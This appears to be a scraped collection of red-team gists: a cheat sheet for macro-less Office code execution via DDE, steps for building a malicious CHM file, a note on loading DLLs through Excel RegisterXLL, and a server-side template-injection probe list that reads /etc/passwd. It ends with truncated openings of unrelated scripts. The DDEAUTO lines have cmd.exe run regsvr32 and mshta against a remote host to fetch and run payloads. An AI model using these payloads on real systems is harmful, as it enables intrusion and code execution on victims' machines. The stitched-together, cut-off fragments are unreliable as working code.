AmesianX AmesianX

Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

Using regsvr32 *.sct files technique:

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"

Using HTA files technique:

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"

Procedure for generating Malicious CHM file

Step 0: Download and install Microsoft HTML Help Workshop and Documentation
Step 1: Obtain a valid CHM file and unpack it using 7-zip
Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

	#!/usr/bin/python

	import sys
	import socket
	import argparse
	import threading

	config = {
	'debug': False,
	'verbose': False,

	//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
	//posted by @JohnLaTwC
	// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html

	----------------------------------------------- macro ----------------------------------

	Private Sub Workbook_Open()
	Call doom_Init
	Call doom_ShowHideSheets
	End Sub

	#!/usr/bin/python3
	#
	# Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or
	# .NET/CLR assembly EXE file into inline-task XML file that can be further launched by:
	# %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
	#
	# Requirements:
	# - pefile
	#
	# Mariusz B. / mgeeky, <[email protected]>

	##### LOOK FOR 1868686868
	<%= 36692 * 50929 %>
	<%= File.open('/etc/passwd').read %>
	${36692*50929}
	18686{xxxxxxxxxx}86868
	${"18686".join("86868")}
	${36692*'50929'}
	${{36692*50929}}
	${{36692*'50929'}}
	{{36692*'50929'}}

	def hexdump(data, addr = 0, num = 0):
	s = ''
	n = 0
	lines = []
	if num == 0: num = len(data)

	if len(data) == 0:
	return '<empty>'

	for i in range(0, num, 16):

	#!/bin/bash

	if [ $# -ne 2 ] ; then
	echo "Usage: ./create-s3-website.sh <s3-bucket-name> <website-local-dir>"
	exit 1
	fi

	S3_BUCKET_NAME=$1
	WEBSITE_DIR=$2
	INDEX_DOCUMENT=index.html

	#include "stdafx.h"

	BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
	TOKEN_PRIVILEGES tp;
	LUID luid;
	TOKEN_PRIVILEGES tpPrevious;
	DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);

	if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;